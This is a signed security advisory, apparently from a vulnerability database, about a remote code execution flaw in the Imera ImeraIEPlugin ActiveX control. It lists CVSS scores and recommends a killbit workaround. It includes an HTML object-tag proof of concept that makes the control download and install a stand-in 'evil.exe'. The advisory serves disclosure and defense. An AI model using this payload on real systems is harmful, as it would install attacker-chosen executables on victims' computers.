Imera ImeraIEPlugin ActiveX Control Remote Code Execution

Credit: Elazar Broad
Risk: High
Local: No
Remote: No

CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Who: Imera( Imera TeamLinks Client( What: ImeraIEPlugin.dll Version Dated 12/02/2008 {75CC8584-86D4-4A50-B976-AA72618322C6} How: This control is used to install the Imera TeamLinks Client package. The control fails to validate the content that it is to download and install is indeed the Imera TeamLinks Client software. Exploiting this issue is quite simple, like so: <object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6" id="obj"> <param name="DownloadProtocol" value="http" /> <param name="DownloadHost" value="" /> <param name="DownloadPort" value="80" /> <param name="DownloadURI" value="evil.exe" /> </object> Fix: The vendor has been notified. Workaround: Set the killbit for the affected control, see Use the Java installer for TeamLinks Client or install the software manually from: Elazar -----BEGIN PGP SIGNATURE----- Charset: UTF8 Note: This signature can be verified at Version: Hush 3.0 wpwEAQECAAYFAkmtR6YACgkQi04xwClgpZgbTgP/T3l+Gj+pIt19H80tiHrlbpbB7+qh /03/vQYTEL75n0XCmfGjbcurLhWlo+m90eDQwlgigq3CoQyqleKNI8kSDYjr2pw289Pm qC21ASe/P3zIM+gt81+iqDtKMA/MGvOE20nrHVEWlatAlCgmSjt3MJhqEJ/GdzUiR22s BDrpVM8= =R0h3 -----END PGP SIGNATURE-----


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top